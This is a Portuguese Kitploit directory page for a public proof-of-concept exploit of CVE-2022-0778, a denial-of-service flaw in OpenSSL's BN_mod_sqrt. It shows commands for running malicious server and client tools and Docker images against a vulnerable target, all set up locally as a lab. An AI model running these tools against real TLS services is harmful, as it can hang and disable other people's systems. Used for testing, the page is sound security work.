Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2022-0778 — Exploit de prova de conceito para CVE-2022-0778, uma vulnerabilidade de negação de serviço no BN_mod_sqrt do OpenSSL. Inclui implementações maliciosas de servidor e cliente para acionar loops infinitos em conexões TLS/HTTPS vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/yywing/cve-2022-0778
Análise de VulnerabilidadesExploraçãoSegurança WebSegurança de RedeTestes de Penetração
GitHubyywing/cve-2022-0778

cve-2022-0778

Exploit de prova de conceito para CVE-2022-0778, uma vulnerabilidade de negação de serviço no BN_mod_sqrt do OpenSSL. Inclui implementações maliciosas de servidor e cliente para acionar loops infinitos em conexões TLS/HTTPS vulneráveis.

Ver Repositório
95há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

cve-2022-0778

servidor malicioso

root@kitploit:~
go run server/main.go --addr 127.0.0.1:12345

cd test && test_server.sh

docker stat

cliente malicioso

root@kitploit:~
cd test && test_client.sh

go run client/main.go  --network tcp --addr 127.0.0.1:12345

docker stat

construir

root@kitploit:~
docker build -t cve-2022-0778 .

hub do docker

root@kitploit:~
# iniciar servidor vulnerável
docker pull yywing/cve-2022-0778-target
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778-target python server.py
# ataque
docker pull yywing/cve-2022-0778
docker run -it --rm --entrypoint badclient yywing/cve-2022-0778 --addr host.docker.internal:12345

# iniciar servidor malicioso
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345
# usar cliente vulnerável
docker run -it --rm yywing/cve-2022-0778-target python -c "import http.client;http.client.HTTPSConnection('host.docker.internal', 12345).request('GET', '/')"
# ou
docker run -it --rm yywing/cve-2022-0778-target curl https://host.docker.internal:12345
Baixar ferramenta